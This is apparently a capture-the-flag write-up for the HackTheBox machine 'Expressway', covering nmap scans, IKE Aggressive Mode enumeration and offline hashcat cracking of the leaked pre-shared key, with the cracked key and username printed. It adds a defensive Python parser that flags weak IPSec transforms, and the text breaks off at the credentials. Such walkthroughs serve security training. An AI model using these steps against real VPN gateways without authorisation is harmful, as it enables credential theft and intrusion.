HackTheBox: Expressway - Writeup

Machine Information

  • Hostname: expressway.htb
  • Difficulty: easy
  • OS: Linux (Debian)
  • Services: SSH, IPSec VPN

Executive Summary

Expressway is a Linux machine that demonstrates the dangers of weak IPSec VPN configurations and sudo vulnerabilities. Initial access is gained by exploiting IKE Aggressive Mode to retrieve and crack a weak pre-shared key (PSK), allowing SSH access. Privilege escalation is achieved through CVE-2025-32463, a sudo chroot escape vulnerability.


Enumeration

Initial Port Scanning

Starting with a standard TCP service scan to identify open ports and running services:

nmap -sV -sC 10.129.x.x

Full Results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:45 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds

Only SSH is exposed on TCP, suggesting we need to look deeper.

UDP Scanning

Since TCP yielded limited results, let's check for UDP services:

nmap -sU 10.129.x.x --min-rate 5000

Full Results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-20 14:48 CDT
Nmap scan report for Expressway.htb (10.129.x.x)
Host is up (0.011s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
500/udp   open   isakmp

Nmap done: 1 IP address (1 host up) scanned in 0.73 seconds

Port 500/udp indicates an IPSec VPN service is running. ISAKMP (Internet Security Association and Key Management Protocol) is used for establishing Security Associations in IPSec.


VPN Service Analysis

IKE (Internet Key Exchange) Enumeration

The presence of port 500/udp suggests IPSec VPN. Let's use ike-scan to enumerate the IKE service:

sudo ike-scan -M expressway.htb

Full Output:

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x	Main Mode Handshake returned
	HDR=(CKY-R=9f82d861ee3ca556)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.124 seconds (8.07 hosts/sec).  1 returned handshake; 0 returned notify

Key Observations:

  • Main Mode handshake successful
  • Encryption: 3DES (weak by modern standards)
  • Hash: SHA1
  • Authentication: PSK (Pre-Shared Key)
  • XAUTH support detected
  • Dead Peer Detection enabled

Aggressive Mode Testing

In Main Mode the identities and the authentication hash are exchanged only after the Diffie-Hellman exchange, so they travel encrypted. Aggressive Mode instead returns the responder's identity and its hash (HASH_R) in the clear in the first reply, so a single captured handshake can be cracked offline against a PSK wordlist:

sudo ike-scan -A -Ppsk.txt expressway.htb

Critical Discovery:

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.x.x	Aggressive Mode Handshake returned 
	HDR=(CKY-R=11ddb728fb4c93f1) 
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) 
	KeyExchange(128 bytes) 
	Nonce(32 bytes) 
	ID(Type=ID_USER_FQDN, ike@expressway.htb) 
	VID=09002689dfd6b712 (XAUTH) 
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 
	Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.016 seconds (60.74 hosts/sec).  1 returned handshake; 0 returned notify

Success! Aggressive Mode leaked:

  • User Identity: ike@expressway.htb
  • Handshake data needed for offline PSK cracking written to psk.txt by the -P option
  • Full handshake with KeyExchange, Nonce, and Hash data captured

Hash Cracking

Extracting the PSK

The Aggressive Mode response contains HASH_R, which is derived from the PSK together with the other handshake values that ike-scan saved. Let's crack it using hashcat:

hashcat psk.txt /usr/share/wordlists/rockyou.txt

Hashcat auto-detects the hash type as:

  • Hash Mode: 5400 (IKE-PSK SHA1)

To view the cracked result:

hashcat psk.txt /usr/share/wordlists/rockyou.txt --show

Full Output:

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5400 | IKE-PSK SHA1 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

ac40728b45d9e097252ecef2c31da0e2d081ccc2163b6b6cac087a087ad8ded7ed8f27539964b2779e2c5e547d74aa282b3a8afd449d4b8cbbf4cfa9ad0cfc896b65a90599b84b2b67728cb434db8bf048897070db8996988ba70d584167d5c029bb8e36e31f123ce2bafa9f9aa850fcb917aa2ecc8d1a07c64ab32016e03533:168cef94af426be072780df8b134faf08741bf3b62e1e93c657a19f0e11a2fca668da45cc9c7561100ce28085fd3e27136d731225549c71e77379e75fc2224676f4219a91f9cac53e8fc849b4d72d633b7ad42f138a2c1f55416db4c428e6d6d8d2dbeada86dc81d9d1c040795080f91f9237f793ac4f038db157644ecd8a724:11ddb728fb4c93f1:ecb2bdd2ba3e7df7:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e68:0925fbf9f188daf8bb3f4fbace1167d63a0e63a0:2a6b8d6ae489335962160c9caeb668bf7e77b6c2e51a5675d693504a87d1b093:b211eb1d061230d3e072758b8e581cff96aecee1:freakingrockstarontheroad
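The fifth colon-separated field of that line is SAi_b, the SA payload body ike-scan offered; the responder accepted its first transform (3DES, SHA1, PSK, modp1024), as the SA= line in the Aggressive Mode output shows. The following is an added example, not code from the original writeup, that decodes such an SA body with the RFC 2409 attribute codes and flags every transform attribute a VPN policy should refuse; the same parser works on a responder's SA payload taken from a capture, which is how a defender would audit what a gateway actually accepts.

```python
# Added example, not part of the original writeup: decode the SAi_b field of the
# hashcat 5400 line above and flag transforms a VPN policy should refuse.
# Attribute and value codes follow RFC 2409 Appendix A.
ATTR = {1: "Enc", 2: "Hash", 3: "Auth", 4: "Group", 11: "LifeType", 12: "LifeDuration"}
NAMES = {"Enc": {1: "DES", 5: "3DES", 7: "AES"}, "Hash": {1: "MD5", 2: "SHA1", 4: "SHA2-256"},
         "Auth": {1: "PSK", 3: "RSA_Sig"}, "Group": {1: "modp768", 2: "modp1024", 14: "modp2048"}}
WEAK = {"DES", "3DES", "MD5", "SHA1", "modp768", "modp1024", "PSK"}

# SAi_b field copied from the hashcat line in this writeup (page data, not constructed)
SAI_B_HEX = (
    "00000001000000010000009801010004"                                            # DOI, situation, proposal hdr
    "030000240101000080010005800200028003000180040002800b0001000c000400007080"    # transform 1
    "030000240201000080010005800200018003000180040002800b0001000c000400007080"    # transform 2
    "030000240301000080010001800200028003000180040002800b0001000c000400007080"    # transform 3
    "000000240401000080010001800200018003000180040002800b0001000c000400007080"    # transform 4
)

def parse_sa_body(sa_hex):
    """Return [(transform_number, {attr_name: named_value})] for an ISAKMP SA payload body."""
    b = bytes.fromhex(sa_hex)
    off = 8                                         # skip DOI(4) and Situation(4)
    n_trans, spi_size = b[off + 7], b[off + 6]      # proposal header fields
    off += 8 + spi_size                             # proposal header (+ SPI, if present)
    transforms = []
    for _ in range(n_trans):
        t_len = int.from_bytes(b[off + 2:off + 4], "big")
        attrs, a = {}, off + 8                      # attributes follow the 8-byte transform header
        while a < off + t_len:
            af = int.from_bytes(b[a:a + 2], "big")
            if af & 0x8000:                         # TV format: 2-byte value
                atype, val, a = af & 0x7FFF, int.from_bytes(b[a + 2:a + 4], "big"), a + 4
            else:                                   # TLV format: 2-byte length, then value
                alen = int.from_bytes(b[a + 2:a + 4], "big")
                atype, val, a = af, int.from_bytes(b[a + 4:a + 4 + alen], "big"), a + 4 + alen
            name = ATTR.get(atype, atype)
            attrs[name] = NAMES[name].get(val, val) if name in NAMES else val
        transforms.append((b[off + 4], attrs))
        off += t_len
    return transforms

def audit(sa_hex):
    """List (transform_number, 'Attr=value') findings for every weak attribute offered."""
    return [(num, f"{k}={v}") for num, attrs in parse_sa_body(sa_hex)
            for k, v in attrs.items() if v in WEAK]

if __name__ == "__main__":
    for num, attrs in parse_sa_body(SAI_B_HEX):
        print(f"transform {num}: {attrs}")
    print(audit(SAI_B_HEX))
```

Every one of the four offered transforms is flagged on all four of encryption, hash, authentication and group, which matches the weak parameters listed under Key Observations.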

Cracked Credentials:

  • Username: ike